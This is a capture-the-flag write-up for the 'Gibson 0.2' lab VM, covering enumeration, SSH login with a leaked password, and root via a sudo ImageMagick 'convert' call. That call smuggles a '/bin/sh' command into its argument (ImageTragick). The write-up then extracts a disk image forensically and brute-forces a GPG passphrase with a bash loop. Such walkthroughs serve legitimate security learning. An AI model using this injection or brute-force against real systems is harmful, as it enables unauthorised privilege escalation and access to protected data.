published on in writeup
tags: gibson

Gibson 0.2

Livestream

Writeup

nmap

[email protected]:~# nmap -n -p- -sV 192.168.56.102

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7

davinci

Opening the page in Iceweasel, we get a simple directory lising with davinci.html.

<html>
<title>Gibson Mining Corporation</title>
<body>
<!-- Damn it Margo! Stop setting your password to "god" -->
<!-- at least try and use a different one of the 4 most -->
<!-- common ones! (eugene) -->
<h1> The answer you seek will be found by brute force</h1>
</body>

SSH

We can use margo:god to establish an SSH session :)

[email protected]:~# ssh [email protected]

[email protected]'s password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)

[email protected]:~$ id
uid=1002(margo) gid=1002(margo) groups=1002(margo),27(sudo)

[email protected]:~$ sudo -l
Matching Defaults entries for margo on gibson:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User margo may run the following commands on gibson:
    (ALL) NOPASSWD: /usr/bin/convert

Image Tragick

We’ll check the version first to make sure it is vulnerable.

[email protected]:~$ convert --version
Version: ImageMagick 6.7.7-10

Then we can exploit the vulnerability and execute /bin/sh to get a root shell ^_^

[email protected]:~$ sudo convert 'https://example.com";/bin/sh"' out.png
# id
uid=0(root) gid=0(root) groups=0(root)

Where art thou, flag?

There’s no flag in /root, so it looks like we’ll have to look at little deeper.

# ps aux

libvirt+  1303  0.5  7.3 841876 111516 ?       Sl   22:33   0:21 /usr/bin/qemu-system-x86_64 -name ftpserv -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 2

# ifconfig
virbr0    Link encap:Ethernet  HWaddr fe:54:00:72:e2:fb  
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1271 (1.2 KB)  TX bytes:1889 (1.8 KB)

# netstat -antp

tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      1290/dnsmasq    
tcp        0      0 127.0.0.1:5900          0.0.0.0:*               LISTEN      1303/qemu-system-x8

Something is running virtualised on 192.168.122.1 and is binding a VNC service onto the localhost. We could setup an SSH forwarder back to our machine and use a VNC client to interact with the image. But I figured I would just find the image, move it to my kali VM and interact with it forensically.

We can see from the process list that the name of the image is ftpserv, so we can just search based on that.

# find / -name ftpserv*

/var/lib/libvirt/images/ftpserv.img

I copied it to the web root for easy downloading

# cp /var/lib/libvirt/images/ftpserv.img /var/www/html
# chmod 666 /var/www/html/ftpserv.img

[email protected]:~# wget http://192.168.56.102/ftpserv.img

[email protected]:~# file ftpserv.img 
ftpserv.img: DOS/MBR boot sector, FREE-DOS Beta 0.9 MBR; partition 1 : ID=0xe, active, start-CHS (0x0,1,1), end-CHS (0xf,15,63), startsector 63, 1048257 sectors

Sleuthing

First, display the partition layout of the volume with mmls

[email protected]:~# mmls ftpserv.img 
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

      Slot      Start        End          Length       Description
000:  Meta      0000000000   0000000000   0000000001   Primary Table (#0)
001:  -------   0000000000   0000000062   0000000063   Unallocated
002:  000:000   0000000063   0001048319   0001048257   Win95 FAT16 (0x0e)
003:  -------   0001048320   0001048575   0000000256   Unallocated

Take note of the start offset for the FAT16 partition, which is 63. Then list file and directory names in the disk image using fls.

[email protected]:~# fls -f fat16 -o 63 ftpserv.img 
r/r 3:	KFYLNN      (Volume Label Entry)
d/d 4:	DOS
r/r 5:	KERNEL.SYS
r/r 6:	AUTOEXEC.BAT
r/r 7:	COMMAND.COM
r/r 8:	FDCONFIG.SYS
r/r 9:	BOOTSECT.BIN
d/d 11:	net
d/d 12:	GARBAGE
r/r * 13:	_WSDPMI.SWP
v/v 16763907:	$MBR
v/v 16763908:	$FAT1
v/v 16763909:	$FAT2
d/d 16763910:	$OrphanFiles

[email protected]:~# fls -f fat16 -o 63 ftpserv.img 12
r/r 845574:	jz_ug.ans
r/r * 845576:	cookies.txt^
r/r 845578:	adminspo.jpg
r/r 845580:	flag.img
r/r * 845582:	cookies.txt^

Looks like flag.img is what we need - we can use icat to extract it.

[email protected]:~# icat -f fat16 -o 63 ftpserv.img 845580 > flag.img

[email protected]:~# file flag.img 
flag.img: Linux rev 1.0 ext2 filesystem data, UUID=d59bdd40-ec37-4d24-a956-80f549846121

You could continue using forensics here, but I was determined to mount something today! :)

[email protected]:~# mount -t ext2 flag.img /mnt/

[email protected]:~# ls -la /mnt/

-rwxrwxr-x  1 root root 21358 Nov 16  2011 davinci
-rw-r--r--  1 root root 28030 Nov 16  2011 davinci.c
-rw-r--r--  1 root root   159 May  5 19:56 hint.txt
drwxr-xr-x  2 root root  1024 May  5 20:07 .trash

[email protected]:~# ls -la /mnt/.trash/

---x------ 1 root root    469 May 14 14:18 flag.txt.gpg
-rw-r--r-- 1 root root 320130 Sep  7  2015 LeithCentralStation.jpg

[email protected]:~# cat /mnt/hint.txt

http://www.imdb.com/title/tt0117951/ and
http://www.imdb.com/title/tt0113243/ have
someone in common... Can you remember his
original nom de plume in 1988...?

So we have a GPG-protected flag and a hint as to what the password could be. I started looking at Jonny Lee Miller and some associated nicknames/aliases etc. Eventually I came up with Sick Boy and Zero Cool. Neither of these worked vanilla, so I thought I’d use john to create a wordlist. I didn’t know off-hand of any tools that could bruteforce GPG, so I wrote a terrible bash wrapper for it.

for p in `cat words`
do
	gpg --output /root/flag --batch --passphrase "${p}" --decrypt /mnt/.trash/flag.txt.gpg

	if [ -a /root/flag ]
	then
		echo 'found'
		exit
	fi
done

None of the wordlists I was created worked, so knigh-home dropped me a hint that it was in leet speak and told me of a leetify script that I should look for. Googling for it brought me to an old post on the BackTrack forum.

So I generated a new wordlist and ran my bruteforce again. These still weren’t working and I was given a final hint to try zerokool instead of zerocool.

[email protected]:~# ./leetify.pl < words > l33t

[email protected]:~# ./gpg.sh 
[...snip...]
gpg: decryption failed: bad key
gpg: CAST5 encrypted data
gpg: encrypted with 1 passphrase
gpg: WARNING: message was not integrity protected
found

[email protected]:~# ls -l

-rw-r--r-- 1 root root       862 May 22 10:34 flag

[email protected]:~# cat flag
 _   _            _      _____ _             ____  _                  _   _
| | | | __ _  ___| | __ |_   _| |__   ___   |  _ \| | __ _ _ __   ___| |_| |
| |_| |/ _` |/ __| |/ /   | | | '_ \ / _ \  | |_) | |/ _` | '_ \ / _ \ __| |
|  _  | (_| | (__|   <    | | | | | |  __/  |  __/| | (_| | | | |  __/ |_|_|
|_| |_|\__,_|\___|_|\_\   |_| |_| |_|\___|  |_|   |_|\__,_|_| |_|\___|\__(_)


Should you not be standing in a 360 degree rotating payphone when reading
this flag...? B-)

Anyhow, congratulations once more on rooting this VM. This time things were
a bit esoteric, but I hope you enjoyed it all the same.

Shout-outs again to #vulnhub for hosting a great learning tool. A special
thanks goes to g0blin and GKNSB for testing, and to g0tM1lk for the offer
to host the CTF once more.
                                                              --Knightmare

Shout outs

Thanks knightmare for the VM and the continued hints throughout the livestream :)

Thanks to everyone who stopped by for the livestream and particularly to those who posted in Twitch chat and the IRC channel. Honourable mentions go to rfc, dqi and superkojiman.